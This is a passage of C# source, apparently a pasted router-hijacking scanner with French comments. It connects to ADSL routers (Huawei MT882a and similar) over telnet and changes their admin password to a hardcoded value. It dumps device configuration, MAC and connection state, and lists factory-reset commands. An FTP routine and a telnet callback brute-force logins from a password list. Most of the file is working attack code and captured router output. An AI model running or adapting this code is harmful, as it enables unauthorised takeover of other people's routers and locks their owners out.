- recv = Sock_scan.Receive(data);
- stringdata = Encoding.ASCII.GetString(data, 0, recv);
- Console.WriteLine("{0} -> " + stringdata, myip);
- Sock_scan.Send(System.Text.Encoding.ASCII.GetBytes("j3R0m3!!" + "\r"), SocketFlags.None);
- recv = Sock_scan.Receive(data);
- stringdata = Encoding.ASCII.GetString(data, 0, recv);
- Console.WriteLine("{0} -> " + stringdata, myip);
- Sock_scan.Send(System.Text.Encoding.ASCII.GetBytes("j3R0m3!!" + "\r"), SocketFlags.None);
- recv = Sock_scan.Receive(data);
- stringdata = Encoding.ASCII.GetString(data, 0, recv);
- Console.WriteLine("{0} -> " + stringdata, myip);
- Sock_scan.Send(System.Text.Encoding.ASCII.GetBytes("\r"), SocketFlags.None);
- recv = Sock_scan.Receive(data);
- stringdata = Encoding.ASCII.GetString(data, 0, recv);
- Console.WriteLine("{0} -> " + stringdata, myip);
- //(Saving to ROM...)
- //Retour menu
- }
- else
- {
- Sock_scan.Send(System.Text.Encoding.ASCII.GetBytes("sys adminPassword j3R0m3!!" + "\r"), SocketFlags.None);
- recv = Sock_scan.Receive(data);
- stringdata = Encoding.ASCII.GetString(data, 0, recv);
- Console.WriteLine("{0} -> " + stringdata, myip);
- }
- }
- else
- {
- Sock_scan.Send(System.Text.Encoding.ASCII.GetBytes("sys password j3R0m3!!" + "\r"), SocketFlags.None);
- recv = Sock_scan.Receive(data);
- stringdata = Encoding.ASCII.GetString(data, 0, recv);
- Console.WriteLine("{0} -> " + stringdata, myip);
- //save ok, new password is: j3R0m3!!.
- ////Exemple: Vulcan
- ////Erreur: Commande Invalide
- ////$passwd
- //Sock_scan.Send(System.Text.Encoding.ASCII.GetBytes("passwd" + "\r"), SocketFlags.None);
- ////Enter Old Password:
- //Sock_scan.Send(System.Text.Encoding.ASCII.GetBytes("admin" + "\r"), SocketFlags.None);
- ////Enter New Password:
- //Sock_scan.Send(System.Text.Encoding.ASCII.GetBytes("j3R0m3!!" + "\r"), SocketFlags.None);
- ////Confirm New Password:
- //Sock_scan.Send(System.Text.Encoding.ASCII.GetBytes("j3R0m3!!" + "\r"), SocketFlags.None);
- ////Set Done
- ////SINON: Erreur: Combinaison nom dÆutilisateur/mot de passe invalide
- }
- Sock_scan.Send(System.Text.Encoding.ASCII.GetBytes("show all" + "\r"), SocketFlags.None);
- recv = Sock_scan.Receive(data);
- stringdata = Encoding.ASCII.GetString(data, 0, recv);
- Console.WriteLine("{0} -> " + stringdata, myip);
- recv = Sock_scan.Receive(data);
- stringdata = Encoding.ASCII.GetString(data, 0, recv);
- Console.WriteLine("{0} -> " + stringdata, myip);
- recv = Sock_scan.Receive(data);
- stringdata = Encoding.ASCII.GetString(data, 0, recv);
- Console.WriteLine("{0} -> " + stringdata, myip);
- recv = Sock_scan.Receive(data);
- stringdata = Encoding.ASCII.GetString(data, 0, recv);
- Console.WriteLine("{0} -> " + stringdata, myip);
- recv = Sock_scan.Receive(data);
- stringdata = Encoding.ASCII.GetString(data, 0, recv);
- Console.WriteLine("{0} -> " + stringdata, myip);
- //***************
- Sock_scan.Send(System.Text.Encoding.ASCII.GetBytes("sys atsh" + "\r"), SocketFlags.None); //for MAC address
- recv = Sock_scan.Receive(data);
- stringdata = Encoding.ASCII.GetString(data, 0, recv);
- Console.WriteLine("{0} -> " + stringdata, myip);
- recv = Sock_scan.Receive(data);
- stringdata = Encoding.ASCII.GetString(data, 0, recv);
- Console.WriteLine("{0} -> " + stringdata, myip);
- recv = Sock_scan.Receive(data);
- stringdata = Encoding.ASCII.GetString(data, 0, recv);
- Console.WriteLine("{0} -> " + stringdata, myip);
- recv = Sock_scan.Receive(data);
- stringdata = Encoding.ASCII.GetString(data, 0, recv);
- Console.WriteLine("{0} -> " + stringdata, myip);
- recv = Sock_scan.Receive(data);
- stringdata = Encoding.ASCII.GetString(data, 0, recv);
- Console.WriteLine("{0} -> " + stringdata, myip);
- /*
- D-Link DSL 526B >restoredefault
- Huawei SmartAX MT882a >sys romreset
- TP-Link TD-8817 >sys romreset
- */
- //***************
- //For MT882A
- /*
- MT882a> ether config
- --------------- NDIS CONFIGURATION BLOCK ----------------
- type=1 flags=0001
- Board/Chassis:1 Lines/Board:1 Channels/Lines:2 Total Channel:2
- task-id=8041f1f4 event-q=80458c2c(19) data-q=80458c70(1a) func-id=2
- board-cfg=8042c8a4 line-cfg=8042c8bc chann-cfg=8042c8d0
- board-pp (8042c8f0)
- 804273fc
- line-pp (8042c8f4)
- 8042956c
- chann-pp (8042c8f8)
- 804bf8a4 804bfe34
- --------------- BOARD DISPLAY ---------------------------
- ID slot# n-line n-chann status line-cfg chann-cfg
- 00 0 1 2 0001 8042c8bc 8042c8d0
- --------------- LINE DISPLAY ---------------------------
- ID line# board-id n-chann chann-cfg
- 00 1 00 2 8042c8d0
- --------------- CHANNEL DISPLAY -------------------------
- ID chan# line-id board-id address name
- 00 1 00 00 804bf8a4 enet0
- 01 2 00 00 804bfe34 enet1
- */
- Sock_scan.Send(System.Text.Encoding.ASCII.GetBytes("ether config" + "\r"), SocketFlags.None);
- recv = Sock_scan.Receive(data);
- stringdata = Encoding.ASCII.GetString(data, 0, recv);
- Console.WriteLine("{0} -> " + stringdata, myip);
- recv = Sock_scan.Receive(data);
- stringdata = Encoding.ASCII.GetString(data, 0, recv);
- Console.WriteLine("{0} -> " + stringdata, myip);
- recv = Sock_scan.Receive(data);
- stringdata = Encoding.ASCII.GetString(data, 0, recv);
- Console.WriteLine("{0} -> " + stringdata, myip);
- recv = Sock_scan.Receive(data);
- stringdata = Encoding.ASCII.GetString(data, 0, recv);
- Console.WriteLine("{0} -> " + stringdata, myip);
- recv = Sock_scan.Receive(data);
- stringdata = Encoding.ASCII.GetString(data, 0, recv);
- Console.WriteLine("{0} -> " + stringdata, myip);
- Sock_scan.Send(System.Text.Encoding.ASCII.GetBytes("ip tcp status" + "\r"), SocketFlags.None);
- recv = Sock_scan.Receive(data);
- stringdata = Encoding.ASCII.GetString(data, 0, recv);
- Console.WriteLine("{0} -> " + stringdata, myip);
- recv = Sock_scan.Receive(data);
- stringdata = Encoding.ASCII.GetString(data, 0, recv);
- Console.WriteLine("{0} -> " + stringdata, myip);
- recv = Sock_scan.Receive(data);
- stringdata = Encoding.ASCII.GetString(data, 0, recv);
- Console.WriteLine("{0} -> " + stringdata, myip);
- recv = Sock_scan.Receive(data);
- stringdata = Encoding.ASCII.GetString(data, 0, recv);
- Console.WriteLine("{0} -> " + stringdata, myip);
- recv = Sock_scan.Receive(data);
- stringdata = Encoding.ASCII.GetString(data, 0, recv);
- Console.WriteLine("{0} -> " + stringdata, myip);
- /*
- MT882a> ip tcp status
- ( 1)tcpRtoAlgorithm 4 ( 2)tcpRtoMin 0
- ( 3)tcpRtoMax 4294967295 ( 4)tcpMaxConn 16
- ( 5)tcpActiveOpens 0 ( 6)tcpPassiveOpens 477
- ( 7)tcpAttemptFails 42 ( 8)tcpEstabResets 22
- ( 9)tcpCurrEstab 1 (10)tcpInSegs 9765
- (11)tcpOutSegs 2549 (12)tcpRetransSegs 389
- (14)tcpInErrs 2 (15)tcpOutRsts 93
- tcbsInUseCnt = 4
- &TCB Rcv-Q Snd-Q Local socket Remote socket State
- 804fdce4 0 621 41.248.40.35:23 196.12.232.120:61565 Estab 0
- 804fd66c 0 0 0.0.0.0:21 0.0.0.0:0 Listen 0
- 804fd558 0 0 0.0.0.0:7547 0.0.0.0:0 Listen (S) 0
- 804fd444 0 0 0.0.0.0:80 0.0.0.0:0 Listen (S) 0
- */
- Sock_scan.Send(System.Text.Encoding.ASCII.GetBytes("ip udp status" + "\r"), SocketFlags.None);
- recv = Sock_scan.Receive(data);
- stringdata = Encoding.ASCII.GetString(data, 0, recv);
- Console.WriteLine("{0} -> " + stringdata, myip);
- recv = Sock_scan.Receive(data);
- stringdata = Encoding.ASCII.GetString(data, 0, recv);
- Console.WriteLine("{0} -> " + stringdata, myip);
- recv = Sock_scan.Receive(data);
- stringdata = Encoding.ASCII.GetString(data, 0, recv);
- Console.WriteLine("{0} -> " + stringdata, myip);
- recv = Sock_scan.Receive(data);
- stringdata = Encoding.ASCII.GetString(data, 0, recv);
- Console.WriteLine("{0} -> " + stringdata, myip);
- recv = Sock_scan.Receive(data);
- stringdata = Encoding.ASCII.GetString(data, 0, recv);
- Console.WriteLine("{0} -> " + stringdata, myip);
- //ATTACK
- /*
- MT882a> ip ping
- Usage: ping <hostid>
- MT882a> ip ping www.google.com
- Resolving www.google.com... 173.194.67.105
- sent rcvd rate rtt avg mdev max min
- 1 1 100 80 80 0 80 80
- 2 2 100 80 80 0 80 80
- 3 3 100 80 80 0 80 80
- */
- /*
- MT882a> ip route
- status add addiface addprivate
- addrom drop
- MT882a> ip route status
- Dest FF Len Device Gateway Metric stat Timer Use RN
- 41.248.40.1 00 32 poe0 41.248.40.1 1 0329 0 0 ISP-0
- 192.168.1.0 00 24 enet0 192.168.1.1 1 041b 0 0
- default 00 0 poe0 ISP-0 2 00ab 0 3245 ISP-0
- */
- /*
- MT882a> ether driver
- cnt status config ackdrop
- macnum ackmode etherppp wan2lan
- MT882a> ether driver cnt
- disp
- MT882a> ether driver cnt disp
- Usage: disp <name>
- MT882a> ether driver status
- Usage: driver status <ch-name>
- MT882a> ether driver config
- Usage: driver config [0|1=auto|normal] [0|1=10|100] [0|1=HD|FD] <ch-name>
- MT882a> ether driver ackdrop
- current ack drop number is 0
- ack drop cnt=0
- Usage: ackdrop <number>
- MT882a> ether driver macnum
- Please input allowed mac number(0~255), 0 means no limitation
- Current allowed mac number: 0
- MT882a> ether driver ackmode
- TCP ACK mode: off
- ACK length: 90
- TCP ACK mode type: Task
- MT882a> ether driver etherppp
- PPP check : on
- MT882a> ether driver wan2lan
- Usage: wan2lan [on||off] <number>
- Current wan2lan feature status: off
- */
- /*
- MT882a> wan
- atm node hwsar adsl
- tsarm
- MT882a> wan atm
- test mpoasendloop oam vcpool
- MT882a> wan atm test
- Usage: test [fix|rand|period|oam|loopback]
- MT882a> wan node
- index display clear save
- ispname enable disable encap
- mux vpi vci qos
- pcr scr mbs cdvt
- wanip remoteip bridge routeip
- nat rip multicast callsch
- service nailedup filter ppp
- mtu default_r
- MT882a> wan node display
- WAN node index = 1
- Active = no
- Route IP = off
- Bridge = off
- Name =
- Encapsulcation <2:PPPoE|3:RFC1483|4:PPPoA|5:Enet Encap> = 0
- Mux <1:LLC|2:VC> = 0
- VPI/VCI = 0 / 0
- PPPoE service name =
- PPP username =
- PPP password =
- PPP authentication <1:PAP|2:CHAP|3:BOTH> = 0
- SUA/NAT is disabled
- Static IP address
- WAN IP address = 0.0.0.0
- Remote IP address = 0.0.0.0
- Remote IP subnet mask = 0.0.0.0
- Idle timeout = 0
- Call scheduling set = 1 1 1 1
- Nailed-up connection = off
- QOS Type <2:CBR|3:UBR|4:rtVBR|5:nrtVBR|6:GFR> = 0
- QOS PCR/SCR/MBS/CDVT = 0, 0, 0, 0
- RIP direction <0:none|1:both|2:in|3:out>= 0
- RIP version <0:RIP-1|1:RIP-2B|2:RIP-2M> = 0
- Multicast <0:IGMP-v2|1:IGMP-v1|2:none> = 0
- Incoming protocol filter set = 1 1 1 1
- Incoming device filter set = 1 1 1 1
- Outgoing protocol filter set = 1 1 1 1
- Outgoing device filter set = 1 1 1 1
- MT882a> wan node wanip
- Usage: wan node wanip <static> <ip address>
- or: wan node wanip <dynamic>
- errcode = -4
- */
- /*
- MT882a> wan adsl
- chandata close coding defbitmap
- linedata open opencmd opmode
- perfdata reset status version
- vendorid utopia nearituid farituid
- cellcnt display rateadap dumpcondition
- sampletime noisegt noisemargin persisttime
- timeinterval defectcheck txgain targetnoise
- txfilter setrvid txtones snroffset
- errorsecond diag watchdog fwversion
- uptime dumprate annex
- MT882a> wan adsl display
- shutdown rateup
- MT882a> wan adsl fwversion
- DMT FwVer: 3.11.2.151_A_TC3086 HwVer: T14F7_5.0
- MT882a> wan adsl utopia
- UTOPIA parameters:
- level: 1
- fast address: 0
- interleaved address: 1
- MT882a> wan adsl coding
- line coding: DMT
- MT882a> wan adsl txtones
- usage: <start tone> <end tone> tone=0x6~0x1F
- current value: start_tone=6 end_tone=1f
- MT882a> wan adsl opmode
- operational mode: ITU G.992.5(ADSL2PLUS)
- MT882a> wan adsl uptime
- ADSL uptime 122:15:16
- MT882a> wan adsl sampletime
- Usage: min
- MT882a> wan adsl linedata
- far near
- MT882a> wan adsl linedata near
- relative capacity occupation: 100%
- noise margin downstream: 37.0 db
- output power upstream: 11.3 dbm
- attenuation downstream: 13.7 db
- MT882a> wan adsl linedata far
- relative capacity occupation: 100%
- noise margin upstream: 34.5 db
- output power downstream: 19.3 dbm
- attenuation upstream: 9.6 db
- carrier load: number of bits per symbol(tone)
- tone 0- 31: 00 00 00 00 02 25 56 66 66 66 66 66 55 44 43 20
- tone 32- 63: 00 00 00 00 00 00 00 00 00 00 04 34 45 55 54 55
- tone 64- 95: 10 44 53 65 53 05 05 56 66 65 53 65 36 65 66 54
- tone 96-127: 55 65 55 45 55 54 45 45 14 55 41 55 45 55 45 51
- tone 128-159: 54 45 54 55 44 55 55 55 55 45 65 45 45 46 54 56
- tone 160-191: 54 55 45 50 04 00 45 05 05 44 54 54 55 35 40 54
- tone 192-223: 55 55 50 45 05 00 55 00 40 00 00 00 00 00 00 00
- tone 224-255: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
- tone 256-287: 00 00 50 00 00 00 50 00 00 40 00 40 00 00 00 00
- tone 288-319: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
- tone 320-351: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
- tone 352-383: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
- tone 384-415: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
- tone 416-447: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
- tone 448-479: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
- tone 480-511: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
- MT882a> dot1q disp
- 802.1Q Tagged-based VLAN: Inactive(1)
- Port | PVID || Port | PVID || Port | PVID || Port | PVID ||
- ------+--------++------+--------++------+--------++------+--------++
- e1 | 1 ||
- p0 | 1 || p1 | 1 || p2 | 1 || p3 | 1 ||
- p4 | 1 || p5 | 1 || p6 | 1 || p7 | 1 ||
- u | 1 ||
- cpu | 15 ||
- No|Act| VID| Name | Egress Port
- --+---+----+-----------+------------------------------------------
- | Tagged Egress Port
- +------------------------------------------
- 0| N | 0| |
- |
- 1| N | 0| |
- |
- 2| N | 0| |
- |
- 3| N | 0| |
- |
- 4| N | 0| |
- |
- 5| N | 0| |
- |
- 6| N | 0| |
- |
- 7| N | 0| |
- |
- 8| N | 0| |
- |
- 9| N | 0| |
- |
- 10| N | 0| |
- |
- 11| N | 0| |
- |
- 12| N | 0| |
- |
- 13| N | 0| |
- |
- 14| Y | 1| vlan14|e1,u,p0,p1,p2,p3,p4,p5,p6,p7
- |
- 15| Y | 15| vlan15|e1,u
- |
- */
- Sock_scan.Close();
- break;
- }
- }
- catch (Exception e)
- {
- Console.WriteLine("DEBUG EXCEPTION02: {0} -> " + e.Message, myip);
- }
- }
- }
- else
- {
- Console.WriteLine("{0} DEBUG no telnet Password: "+banner,myip);
- }
- // Sock_scan.Close();
- }
- public static void ftptry(string myip)
- {
- Console.WriteLine("ftptry");
- byte[] data = new byte[1024];
- string stringdata;
- int recv;
- IPAddress adresseIP = IPAddress.Parse(myip);
- IPEndPoint ip = new IPEndPoint(adresseIP, 21);
- Socket Sock_scan = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp);
- Sock_scan.Connect(ip);
- recv = Sock_scan.Receive(data);
- Console.WriteLine("Banner ftp: " + Encoding.ASCII.GetString(data, 0, recv));
- foreach (string password in passwords)
- {
- try
- {
- Console.WriteLine("{0} -> USER", myip);
- Sock_scan.Send(System.Text.Encoding.ASCII.GetBytes("USER" + Convert.ToChar(32) + "admin" + Convert.ToChar(13) + Convert.ToChar(10)));
- recv = Sock_scan.Receive(data);
- Console.WriteLine("{0} -> Response ftp: " + Encoding.ASCII.GetString(data, 0, recv), myip);
- //331 Please specify the password.
- //331 Enter PASS command
- //331 User name okay, need password.
- Console.WriteLine("{0} -> PASS", myip);
- Sock_scan.Send(System.Text.Encoding.ASCII.GetBytes("PASS" + Convert.ToChar(32) + password + Convert.ToChar(13) + Convert.ToChar(10)));
- recv = Sock_scan.Receive(data);
- stringdata = Encoding.ASCII.GetString(data, 0, recv);
- Console.WriteLine("{0} -> Response ftp: " + stringdata, myip);
- //530 Login incorrect.
- //530 Not logged in.
- //530 User admin cannot log in.
- if (stringdata.Contains("530"))
- {
- Console.Write("{0} -> bad ftp password: {1}\n", myip, password);
- }
- //230 User logged in, proceed.
- if (stringdata.Contains("230"))
- {
- Console.Write("{0} -> FTP PASSWORD IS: {1}\n", myip, password);
- break;
- }
- }
- catch (Exception e)
- {
- Console.WriteLine("{0} -> " + e.Message, myip);
- }
- }
- Sock_scan.Close();
- /*
- FtpWebRequest reqFTP;
- reqFTP = (FtpWebRequest)FtpWebRequest.Create(new Uri("ftp://" + myip+"/"));
- reqFTP.Credentials = new NetworkCredential("login", "pass");
- reqFTP.KeepAlive = false;
- reqFTP.Method = WebRequestMethods.Ftp.ListDirectory;
- // On recupere la response du serveur FTP
- FtpWebResponse response = (FtpWebResponse)reqFTP.GetResponse();
- Console.WriteLine("{0} -> Réponse FTP:" + response, myip);
- /*
- // On récupere le flux de la réponse
- StreamReader monStreamReader = new StreamReader(response.GetResponseStream(), Encoding.Default);
- //On enregistre la liste dans un chaine
- string listeBrute = monStreamReader.ReadToEnd();
- //On recupere l'ensemble des fichiers de la chaine
- string[] liste = listeBrute.Split(Environment.NewLine.ToCharArray()[0]);
- //On retourne la liste des répertoires
- //return liste;
- */
- }
- /*
- public static void ConnectCallback(IAsyncResult ar)
- {
- try
- {
- // Get The connection socket from the callback
- Socket sock1 = (Socket)ar.AsyncState;
- sock1.Blocking = false; // This is a non blocking IO
- if (sock1.Connected)
- {
- // Define a new Callback to read the data
- AsyncCallback recieveData = new AsyncCallback(OnRecievedData);
- // Begin reading data asyncronously
- sock1.BeginReceive(m_byBuff, 0, m_byBuff.Length, SocketFlags.None, recieveData, sock1);
- }
- }
- catch (Exception ex)
- {
- Console.WriteLine(ex.Message, "Setup Recieve callbackProc failed!");
- }
- }
- */
- private static void ConnectCallback(IAsyncResult ar)
- {
- try
- {
- // Retrieve the socket from the state object.
- Socket client = (Socket)ar.AsyncState;
- // Complete the connection.
- client.EndConnect(ar);
- Console.WriteLine("Socket connected to {0}",
- client.RemoteEndPoint.ToString());
- // Signal that the connection has been made.
- connectDone.Set();
- Console.WriteLine("DEBUG ConnectCallback");
- //cpt_th.Decrementer();
- }
- catch (Exception e)
- {
- Console.WriteLine("ERROR ConnectCallback: "+e.ToString());
- }
- }
- private static void Receive(Socket client)
- {
- try
- {
- // Create the state object.
- StateObject state = new StateObject();
- state.workSocket = client;
- // Begin receiving the data from the remote device.
- client.BeginReceive(state.buffer, 0, StateObject.BufferSize, 0,
- new AsyncCallback(ReceiveCallback), state);
- }
- catch (Exception e)
- {
- Console.WriteLine(e.ToString());
- }
- }
- private static void ReceiveCallback(IAsyncResult ar)
- {
- try
- {
- // Retrieve the state object and the client socket
- // from the asynchronous state object.
- StateObject state = (StateObject)ar.AsyncState;
- Socket client = state.workSocket;
- // Read data from the remote device.
- int bytesRead = client.EndReceive(ar);
- if (bytesRead > 0)
- {
- // There might be more data, so store the data received so far.
- state.sb.Append(Encoding.ASCII.GetString(state.buffer, 0, bytesRead));
- // Get the rest of the data.
- client.BeginReceive(state.buffer, 0, StateObject.BufferSize, 0,
- new AsyncCallback(ReceiveCallback), state);
- }
- else
- {
- // All the data has arrived; put it in response.
- if (state.sb.Length > 1)
- {
- response = state.sb.ToString();
- }
- // Signal that all bytes have been received.
- receiveDone.Set();
- }
- }
- catch (Exception e)
- {
- Console.WriteLine(e.ToString());
- }
- }
- // State object for receiving data from remote device.
- public class StateObject
- {
- // Client socket.
- public Socket workSocket = null;
- // Size of receive buffer.
- public const int BufferSize = 256;
- // Receive buffer.
- public byte[] buffer = new byte[BufferSize];
- // Received data string.
- public StringBuilder sb = new StringBuilder();
- }
- private static string ProcessOptions(byte[] m_strLineToProcess)
- {
- string m_DISPLAYTEXT = "";
- string m_strTemp = "";
- string m_strOption = "";
- string m_strNormalText = "";
- bool bScanDone = false;
- int ndx = 0;
- int ldx = 0;
- char ch;
- try
- {
- for (int i = 0; i < m_strLineToProcess.Length; i++)
- {
- Char ss = Convert.ToChar(m_strLineToProcess[i]);
- m_strTemp = m_strTemp + Convert.ToString(ss);
- }
- while (bScanDone != true)
- {
- int lensmk = m_strTemp.Length;
- ndx = m_strTemp.IndexOf(Convert.ToString(IAC));
- if (ndx > lensmk)
- ndx = m_strTemp.Length;
- if (ndx != -1)
- {
- m_DISPLAYTEXT += m_strTemp.Substring(0, ndx);
- ch = m_strTemp[ndx + 1];
- if (ch == DO || ch == DONT || ch == WILL || ch == WONT)
- {
- m_strOption = m_strTemp.Substring(ndx, 3);
- string txt = m_strTemp.Substring(ndx + 3);
- m_DISPLAYTEXT += m_strTemp.Substring(0, ndx);
- m_ListOptions.Add(m_strOption);
- m_strTemp = txt;
- }
- else
- if (ch == IAC)
- {
- m_DISPLAYTEXT = m_strTemp.Substring(0, ndx);
- m_strTemp = m_strTemp.Substring(ndx + 1);
- }
- else
- if (ch == SB)
- {
- m_DISPLAYTEXT = m_strTemp.Substring(0, ndx);
- ldx = m_strTemp.IndexOf(Convert.ToString(SE));
- m_strOption = m_strTemp.Substring(ndx, ldx);
- m_ListOptions.Add(m_strOption);
- m_strTemp = m_strTemp.Substring(ldx);
- }
- }
- else
- {
- m_DISPLAYTEXT = m_DISPLAYTEXT + m_strTemp;
- bScanDone = true;
- }
- }
- m_strNormalText = m_DISPLAYTEXT;
- }
- catch (Exception eP)
- {
- Console.WriteLine(eP.Message, "Application Error!!!");
- //Application.Exit();
- }
- return m_strNormalText;
- }
- public static void OnRecievedData(IAsyncResult ar)
- {
- // Get The connection socket from the callback
- Socket sock = (Socket)ar.AsyncState;
- sock.Blocking = false; // This is a non blocking IO
- // Get The data , if any
- int nBytesRec = sock.EndReceive(ar);
- if (nBytesRec > 0)
- {
- string sRecieved = Encoding.ASCII.GetString(m_byBuff, 0, nBytesRec);
- string m_strLine = "";
- string myline = null;
- for (int i = 0; i < nBytesRec; i++)
- {
- Char ch = Convert.ToChar(m_byBuff[i]);
- switch (ch)
- {
- case '\r':
- m_strLine += Convert.ToString("\r\n");
- break;
- case '\n':
- break;
- default:
- m_strLine += Convert.ToString(ch);
- break;
- }
- }
- try
- {
- int strLinelen = m_strLine.Length;
- if (strLinelen == 0)
- {
- m_strLine = Convert.ToString("\r\n");
- }
- Byte[] mToProcess = new Byte[strLinelen];
- for (int i = 0; i < strLinelen; i++)
- mToProcess[i] = Convert.ToByte(m_strLine[i]);
- // Process the incoming data
- string mOutText = ProcessOptions(mToProcess);
- //if (mOutText != "")
- // textBox1.AppendText(mOutText);
- myline+=mOutText;
- //Console.WriteLine("Received data: {0}", mOutText);
- // Respond to any incoming commands
- //RespondToOptions();
- }
- catch (Exception ex)
- {
- //Object x = this;
- Console.WriteLine(ex.Message, "Information!");
- }
- Console.WriteLine("Received data: {0}", myline);
- if (myline.Contains("Password:"))
- {
- foreach (string password in passwords)
- {
- Thread.Sleep(100);
- try
- {
- //Sock_scan.Send(System.Text.Encoding.ASCII.GetBytes(password + Convert.ToChar(13) + Convert.ToChar(10)));
- sock.Send(System.Text.Encoding.ASCII.GetBytes(password));
- //Thread.Sleep(100);
- byte[] data = new byte[1024];
- //string banner;
- int recv;
- recv = sock.Receive(data);
- string stringdata = Encoding.ASCII.GetString(data, 0, recv);
- Console.WriteLine("{0} -> Response telnet: " + stringdata);
- ///*
- //strRetPage = null;
- //bytes = Sock_scan.Receive(RecvBytes, RecvBytes.Length, 0);
- //strRetPage = strRetPage + ASCII.GetString(RecvBytes, 0, bytes);
- //while (bytes > 0)
- //{
- // bytes = Sock_scan.Receive(RecvBytes, RecvBytes.Length, 0);
- // strRetPage = strRetPage + ASCII.GetString(RecvBytes, 0, bytes);
- //}
- //Console.WriteLine("Response telnet: " + strRetPage);
- //*
- //Bad Password!!!
- if (stringdata.Contains("*") || stringdata.Contains("Password:") || stringdata.Contains("Bad Password"))
- {
- Console.Write("{0} -> bad telnet password: {1}\n", password);
- }
- }
- catch (Exception e)
- {
- Console.WriteLine("{0} -> " + e.Message);
- }
- }
- }
- }
- else
- {
- // If no data was recieved then the connection is probably dead
- Console.WriteLine("Disconnected", sock.RemoteEndPoint);
- sock.Shutdown(SocketShutdown.Both);
- sock.Close();
- }
- }
- public string LocalIPAddress()
- {
- IPHostEntry host;
- string localIP = "";
- host = Dns.GetHostEntry(Dns.GetHostName());
- foreach (IPAddress ip in host.AddressList)
- {
- if (ip.AddressFamily.ToString() == "InterNetwork")
- {
- localIP = ip.ToString();
- }
- }
- return localIP;
- }
- public static IPAddress GetExternalIp()
- {
- string whatIsMyIp = "http://www.whatismyip.com/automation/n09230945.asp";
- WebClient wc = new WebClient();
- UTF8Encoding utf8 = new UTF8Encoding();
- string requestHtml = "";
- try
- {
- requestHtml = utf8.GetString(wc.DownloadData(whatIsMyIp));
- }
- catch (WebException we)
- {
- // do something with exception
- Console.Write(we.ToString());
- }
- IPAddress externalIp = IPAddress.Parse(requestHtml);
- return externalIp;
- }
- public static IPAddress GetExternalIp2()
- {
- WebClient client = new WebClient();
- // Add a user agent header in case the requested URI contains a query.
- client.Headers.Add("user-agent", "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)");
- string baseurl = "http://checkip.dyndns.org/";
- Stream data = client.OpenRead(baseurl);
- StreamReader reader = new StreamReader(data);
- string s = reader.ReadToEnd();
- data.Close();
- reader.Close();
- s = s.Replace("<html><head><title>Current IP Check</title></head><body>Current IP Address: ", "").Replace("</body></html>", "").ToString();
- IPAddress externalIp = IPAddress.Parse(s);
- return externalIp;
- }
- private void Lancer_Thread(object emetteur)
- {
- //Console.WriteLine("Evenement - Lancer_Thread");
- lock (this)
- {
- // Console.WriteLine("DEBUG PULSE");
- Monitor.Pulse(this);
- }
- }
- public class Compteur_thread
- {
- public enum Operation
- {
- Incrementer = 1,
- Decrementer = 2,
- Nb_thread = 3,
- Libre = 4,
- }
- Operation operation = Operation.Incrementer;
- int compteur = 0;
- public delegate void Lancer_Thread(object emetteur);
- public event Lancer_Thread lancer_thread;
- public void Incrementer()
- {
- lock (this)
- {
- // Console.WriteLine("DEBUG INCREMENTER");
- if ((operation == Operation.Decrementer) || (operation == Operation.Nb_thread))
- {
- try
- {
- //Console.WriteLine("Incrementer - Monitor.Wait()");
- Monitor.Wait(this);
- }
- catch (SynchronizationLockException e)
- {
- Console.WriteLine(e.ToString());//, "Thread", MessageBoxButtons.OK, MessageBoxIcon.Error);
- }
- catch (ThreadInterruptedException e)
- {
- Console.WriteLine(e.ToString());//, "Thread", MessageBoxButtons.OK, MessageBoxIcon.Error);
- }
- }
- //Console.WriteLine("Incrementer");
- operation = Operation.Incrementer;
- compteur++;
- Monitor.Pulse(this);
- operation = Operation.Libre;
- }
- }
- public void Decrementer()
- {
- lock (this)
- {
- // Console.WriteLine("DEBUG DECREMENTER");
- if ((operation == Operation.Incrementer) || (operation == Operation.Nb_thread))
- {
- try
- {
- //Console.WriteLine("decrementer - Monitor.Wait()");
- Monitor.Wait(this);
- }
- catch (SynchronizationLockException e)
- {
- Console.WriteLine(e.ToString());//, "Thread", MessageBoxButtons.OK, MessageBoxIcon.Error);
- }
- catch (ThreadInterruptedException e)
- {
- Console.WriteLine(e.ToString());//, "Thread", MessageBoxButtons.OK, MessageBoxIcon.Error);
- }
- }
- //Console.WriteLine("decrementer");
- operation = Operation.Decrementer;
- compteur--;
- if (lancer_thread != null)
- lancer_thread(this);
- Monitor.Pulse(this);
- operation = Operation.Libre;
- }
- }
- public void Nb_thread(out int nb)
- {
- lock (this)
- {
- // Console.WriteLine("DEBUG NB_THREAD");
- if ((operation == Operation.Incrementer) || (operation == Operation.Decrementer))
- {
- try
- {
- //Console.WriteLine("Nb_thread - Monitor.Wait()");
- Monitor.Wait(this);
- }
- catch (SynchronizationLockException e)
- {
- Console.WriteLine(e.ToString());//, "Thread", MessageBoxButtons.OK, MessageBoxIcon.Error);
- }
- catch (ThreadInterruptedException e)
- {
- Console.WriteLine(e.ToString());//, "Thread", MessageBoxButtons.OK, MessageBoxIcon.Error);
- }
- }
- //Console.WriteLine("Nb_Thread classe");
- operation = Operation.Nb_thread;
- nb = compteur;
- Monitor.Pulse(this);
- operation = Operation.Libre;
- }
- }
- }
- }
- }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
